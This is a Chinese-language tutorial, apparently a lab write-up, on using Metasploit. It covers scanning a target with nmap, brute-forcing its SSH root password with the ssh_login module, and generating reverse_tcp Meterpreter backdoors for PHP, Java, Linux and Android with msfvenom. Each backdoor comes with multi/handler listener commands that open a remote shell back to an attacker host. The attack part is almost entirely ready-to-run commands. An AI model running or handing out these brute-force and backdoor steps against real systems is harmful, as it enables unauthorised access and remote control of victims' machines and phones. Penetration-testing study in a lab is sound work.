Metasploit后門滲透Linux系統以及跨平台后門生成
Metasploit后門滲透Linux系統以及跨平台后門生成
1.Metasploit對目標主機SSH爆破
1.1爆破過程
2.PHP后門生成
3.JAVA后門生成
4.LINUX后門生成
5.Android后門生成
☛參考文檔
☛2019-08-28 14:27:50 星期三
1.Metasploit對目標主機SSH爆破
1.1爆破過程
2.PHP后門生成
3.JAVA后門生成
4.LINUX后門生成
5.Android后門生成
☛參考文檔
☛2019-08-28 14:27:50 星期三
1.Metasploit對目標主機SSH爆破
1.實驗原理:靶機root用戶存在弱口令漏洞,利用枚舉的方法破解目標主機ssh服務
1.1爆破過程
1.驗證局域網內部存活主機:nmap -sP 192.168.73.0/24
;得到靶機IP
2.掃描靶機的操作系統:nmap -O 192.168.73.128
;得到靶機的操作系統及版本號
3.掃描靶機的端口開放及應用程序的版本號:nmap -sV -Pn 192.168.73.128
;發現22端口開放,其應用程序為ssh
4.打開Metasploit工具,利用msf ssh_login模塊暴力破解靶機ssh密碼:use auxiliary/scanner/ssh/ssh_login
;進入模塊show options
配置
5.建立用戶名字典及密碼字典(為了減少爆破時間,用戶名及密碼設置特定的幾個即可)
- 將user.txt和pass.txt文件放到kali linux指定目錄下
6.准備進行ssh爆破:設置用戶名字典和密碼字典的路徑;設置靶機的IP地址;設置線程為50;開始執行
- exploit之后,沒有顯示;將VERBOSE設置為
true
即可
2.PHP后門生成
1.示例指令:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php
2.配置Metasploit
,exploit
監聽
search exploit/hanler // (exploit/multi/handler:通用有效負載處理程序)
use exploit/multi/handler // 使用模塊
show options // 配置
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp // 設置測試的載荷
exploit // 監聽
- php后門使用
3.JAVA后門生成
1.示例指令
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar
2.配置Metasploit
,exploit
監聽
search exploit/hanler // (exploit/multi/handler:通用有效負載處理程序)
use exploit/multi/handler // 使用模塊
show options // 配置
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp // 設置測試的載荷
exploit // 監聽
- java后門使用
4.LINUX后門生成
1.示例指令:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell
2.配置Metasploit
,exploit
監聽
search exploit/hanler // (exploit/multi/handler:通用有效負載處理程序)
use exploit/multi/handler // 使用模塊
show options // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp // 設置測試的載荷
exploit // 監聽
- linux后門使用
5.Android后門生成
1.示例指令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=5555 R > /root/Linux/backdoor.apk
2.配置Metasploit
,exploit
監聽
search exploit/hanler // (exploit/multi/handler:通用有效負載處理程序)
use exploit/multi/handler // 使用模塊
show options // 配置
set LHOST 192.168.73.131
set LPORT 5555
set payload android/meterpreter/reverse_tcp // 設置測試的載荷
exploit // 監聽
☛參考文檔
- https://blog.csdn.net/Tahir_111/article/details/82389570
- https://bbs.ichunqiu.com/thread-20137-1-1.html
- Metasploit后門滲透Linux系統以及跨平台后門生成.md